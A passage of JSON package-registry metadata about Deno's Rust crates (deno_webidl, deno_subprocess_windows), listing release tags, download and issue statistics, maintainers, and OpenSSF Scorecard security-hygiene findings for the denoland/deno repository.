s/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T08:01:17.530Z","dependent_packages_count":20,"downloads":1595270,"downloads_period":"total","dependent_repos_count":191,"rankings":{"downloads":3.9071678090451476,"dependent_repos_count":2.8252412075941487,"dependent_packages_count":2.113076019388017,"stargazers_count":0.002334030949250387,"forks_count":0.05912878404767647,"docker_downloads_count":3.08896531333157,"average":1.9993188607259684},"purl":"pkg:cargo/deno_webidl","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_webidl","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_webidl","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_webidl/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webidl/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:38.484Z","updated_at":"2022-11-07T18:29:38.484Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.909Z","updated_at":"2023-07-18T22:41:23.909Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11793916,"name":"deno_subprocess_windows","ecosystem":"cargo","description":"Subprocess API implementation for Windows","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":52,"first_release_published_at":"2025-06-12T12:49:58.463Z","latest_release_published_at":"2026-08-27T15:19:19.499Z","latest_release_number":"0.53.0","last_synced_at":"2026-09-07T23:00:18.492Z","created_at":"2025-06-12T13:01:19.743Z","updated_at":"2026-09-07T23:00:18.492Z","registry_url":"https://crates.io/crates/deno_subprocess_windows/","install_command":"cargo install deno_subprocess_windows","documentation_url":"https://docs.rs/deno_subprocess_windows/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: 